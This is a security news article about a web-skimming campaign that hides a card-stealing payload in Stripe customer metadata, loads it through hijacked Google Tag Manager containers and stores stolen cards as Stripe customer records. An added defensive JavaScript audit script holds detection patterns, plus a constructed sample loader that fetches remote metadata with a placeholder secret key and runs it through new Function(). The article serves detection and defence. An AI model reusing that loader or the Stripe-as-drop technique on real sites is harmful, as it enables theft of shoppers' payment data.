Cybercriminals Exploit Fintech Platform Stripe in Credit Card Skimming Operation 

A new wave of web skimming is abusing one of the fintech sector’s most widely used platforms to host and distribute malicious code that harvests payment details. Security researchers have uncovered a Magecart-style campaign that repurposes Stripe’s infrastructure both to deliver its card-stealing script and to store and receive the data stolen from compromised e-commerce sites.

This approach marks an evolution in web skimming tactics. Traditional Magecart attacks rely on attacker-controlled domains to host payloads and exfiltrate data, which makes them comparatively easy to detect through network monitoring or to block with Content Security Policy (CSP) restrictions.

In contrast, this operation routes everything through domains that online retailers already trust implicitly: those associated with Google Tag Manager (googletagmanager.com) and Stripe’s API endpoints (api.stripe.com).

According to a detailed analysis by e-commerce security specialists at Sansec, the attack begins with the injection of seemingly benign code via compromised Google Tag Manager containers.

These containers, often added by site administrators for analytics or marketing purposes, load on every page visit.

When a shopper navigates to the checkout section—typically on Magento or Adobe Commerce platforms—the loader fetches a concealed JavaScript payload stored within the metadata fields of a specific Stripe customer record.

The payload is fragmented across multiple metadata entries to bypass length limits, then reassembled and executed dynamically in the browser using techniques like new Function().

Once active, the skimmer monitors the checkout process, capturing not just credit card numbers, expiration dates, and CVV codes, but also full billing addresses, names, email addresses, phone numbers, and even order totals.

The harvested data is obfuscated with an XOR cipher and temporarily held in the browser’s localStorage until a separate routine handles the upload.

Exfiltration occurs discreetly: shortly after page load and then at one-minute intervals, the skimmer splits the XOR-encoded blob and writes it into new “customer” records in the attacker’s Stripe account.

This turns Stripe’s own database into a covert drop for stolen cards, with each record masquerading as legitimate customer data.

After a successful upload, the localStorage copy is deleted to avoid detection and duplicate submissions.

The campaign’s Stripe customer record dates back to December 24, 2025, indicating it may have been operational for months.

Researchers also identified a parallel variant that substitutes Google Firestore for Stripe, pulling payloads from documents designed to mimic legitimate payment or CAPTCHA-related traffic.

Both methods exploit the fact that traffic to major cloud and payment APIs is rarely blocked, allowing the skimmer to evade many conventional defenses.

This abuse highlights broader risks in the interconnected digital ecosystem.

The attackers embed a test-mode Stripe secret key (an sk_test_ key, which should never appear in code delivered to a browser) directly in the client-side script. That is an unmistakable sign of compromise, but it gives them a resilient command-and-control and storage channel without maintaining any infrastructure of their own.

E-commerce operators are urged to audit third-party scripts, monitor for unauthorized GTM tags, and scan regularly for anomalies. Consumers can mitigate personal risk by using virtual cards with spending limits.
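The audit the previous paragraph recommends can be started with a static scan of the checkout page’s script tags for the indicators this article describes: Google Tag Manager containers that are not on the operator’s allowlist, a Stripe secret key in client-side code, browser-side calls to the Stripe Customers API, dynamic code execution via new Function()/eval, localStorage staging, and a one-minute upload timer. The following is an added example, not code from Sansec or from the campaign; the sample checkout HTML, the fake sk_test_ key, the customer ID and the GTM container IDs are all constructed for illustration.

```javascript
// Added example: static audit of a page's <script> tags for the skimmer
// indicators described in the article. Runs in Node or a browser console.

// Indicators as regexes. Any hit deserves a look; a Stripe secret key in
// browser-delivered code is a confirmed compromise, not a suspicion.
const INDICATORS = [
  // Stripe secret keys (sk_test_/sk_live_) must never reach the browser.
  { id: "stripe-secret-key", severity: "critical", re: /\bsk_(?:test|live)_[A-Za-z0-9]{8,}/ },
  // Stripe Customers API called from the browser (metadata used as payload store / exfil sink).
  { id: "stripe-customers-api", severity: "high", re: /api\.stripe\.com\/v1\/customers\b/ },
  // Dynamic code execution used to run a reassembled payload.
  { id: "dynamic-code-exec", severity: "high", re: /\bnew\s+Function\s*\(|\beval\s*\(/ },
  // Staging harvested data in localStorage before upload.
  { id: "localstorage-staging", severity: "medium", re: /localStorage\.setItem\s*\(/ },
  // Periodic one-minute upload loop.
  { id: "minute-interval", severity: "low", re: /setInterval\s*\([^)]*,\s*60000\s*\)/ },
];

// Extract every <script> tag as { src, body }.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return scripts;
}

// Flag GTM containers missing from the allowlist and inline scripts that
// match any indicator. Returns an array of { id, severity, detail }.
function auditScripts(html, allowedGtmIds) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      const gtm = /googletagmanager\.com\/gtm\.js\?id=(GTM-[A-Z0-9]+)/i.exec(s.src);
      if (gtm && !allowedGtmIds.includes(gtm[1])) {
        findings.push({ id: "unauthorized-gtm-container", severity: "high", detail: gtm[1] });
      }
    }
    for (const ind of INDICATORS) {
      const hit = ind.re.exec(s.body);
      if (hit) findings.push({ id: ind.id, severity: ind.severity, detail: hit[0].slice(0, 40) });
    }
  }
  return findings;
}

// Constructed sample page (not captured from a real site): one allowlisted GTM
// container, one rogue container, and an inline loader shaped like the one the
// article describes. The key and customer ID are fake placeholders.
const SAMPLE_CHECKOUT_HTML = `
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABC123"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ZZ9X9X"></script>
<script>
  var k = "sk_test_EXAMPLEkey000000000000";
  fetch("https://api.stripe.com/v1/customers/cus_EXAMPLE", { headers: { Authorization: "Bearer " + k } })
    .then(r => r.json())
    .then(c => new Function(Object.values(c.metadata).join(""))());
</script>
</head><body></body></html>`;

// Operator-maintained allowlist of legitimate GTM containers (assumed).
const ALLOWED_GTM = ["GTM-ABC123"];

function runDemo() {
  return auditScripts(SAMPLE_CHECKOUT_HTML, ALLOWED_GTM);
}

console.log(JSON.stringify(runDemo(), null, 2));
```

On a live site, pass document.documentElement.outerHTML in place of the sample and fetch each external src for scanning as well, since a compromised GTM container injects its code at load time and the loader shown above would then appear as an inline script written by gtm.js rather than in the original HTML. Regex matching is a triage aid, not a detector of record: the payload itself lives in Stripe metadata, so this scan surfaces the loader and the leaked key, and a clean result does not prove the page is safe.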

The incident underscores the ongoing cat-and-mouse game between cybercriminals and platform providers.

As fintech services become more embedded in everyday commerce, their trusted status makes them attractive cover for evasion. Businesses must therefore treat client-side security as seriously as backend protections to safeguard sensitive customer data.
